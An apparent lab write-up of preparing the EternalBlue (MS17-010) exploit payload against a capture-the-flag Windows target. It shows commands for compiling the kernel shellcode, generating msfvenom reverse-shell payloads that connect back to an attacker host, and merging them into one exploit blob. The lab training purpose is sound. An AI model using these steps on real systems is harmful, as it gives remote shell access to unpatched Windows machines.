InfoSec LAB

Blue_Payload

Created: 2 min read

Shellcode

The exploit repo comes with a payload generation tool under the /shellcode/ directory It contains the exploit shellcode itself in both the x64 and x86 architecture and a merging tool to put them all together.

In order to achieve code execution and spawn a shell. I would need that as well.

Exploit

┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ ls
eternalblue_kshellcode_x64.asm  eternalblue_sc_merge.py  
eternalblue_kshellcode_x86.asm

I can see the 2 shellcode files written in assembly for both x64 and x86 target. Those need to be compiled first.

┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ nasm -f bin eternalblue_kshellcode_x64.asm -o sc_x64_kernel.bin
 
┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ nasm -f bin eternalblue_kshellcode_x86.asm -o sc_x86_kernel.bin

Compiling them using nasm I am compiling them both since I do not know the system architecture of the target system

Reverse Shell Payload

┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=1234 EXITFUNC=thread -f raw -o sc_x64_msf.bin 
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
payload size: 460 bytes
saved as: sc_x64_msf.bin
 
┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=1235 EXITFUNC=thread -f raw -o sc_x86_msf.bin   
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
payload size: 324 bytes
saved as: sc_x86_msf.bin

Now for the code execution, I will use msfvenom to generate reverse shell payloads for both x64 and x86

Merging

┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
 
┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin

Each of them need to be merged with the corresponding payload

┌──(kali㉿kali)-[~/…/labs/blue/MS17-010/shellcode]
└─$ python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

Then using the supplied merging tool, I can package them all together.

Interactive Graph View

Backlinks